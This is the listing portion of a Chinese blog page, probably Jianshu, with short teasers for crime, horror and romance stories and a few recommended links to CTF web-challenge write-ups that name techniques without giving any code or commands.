    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,747评论 1 222
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,977评论 2 315
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,708评论 0 204
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,448评论 1 246
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,657评论 2 249
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,141评论 1 261
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,493评论 3 258
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,153评论 3 238
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,108评论 0 8
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,890评论 0 198
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,799评论 2 277
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,685评论 2 272

推荐阅读更多精彩内容

  • [南邮OJ](Web)综合题
    题目链接: 综合题 300题目地址:tip:bash 分析:打开题目提供链接 : 明显 JSF*ck 编码 , 使...
    王一航阅读 1,158评论 2 2
  • [南邮OJ](Web)pass check
    题目链接: pass check 300核心源码 题目链接:tip:strcmp(array,string)=nu...
    王一航阅读 1,620评论 0 1
  • [南邮OJ](Web)伪装者
    题目链接: 伪装者 250这是一个到处都有着伪装的世界题目地址:点我 分析:访问网址 : 解题思路为IP伪造 : ...
    王一航阅读 2,180评论 0 3
  • 南京邮电大学 CTF Write Up
    这次来看看某著名大学—— 南京邮电大学的CTF题目吧~ (Ps:因本人较懒,所以做题时都是手工+度娘,几乎没有用到...
    BestBDs阅读 1,836评论 1 2
  • 无标题文章
    生活可能会遇到很多意想不到的故事和痛苦,我只允许消沉痛苦那么一两天,过后就得满血复活,人生谁没了谁都会过好的,人生...
    纯若诗娅阅读 115评论 0 0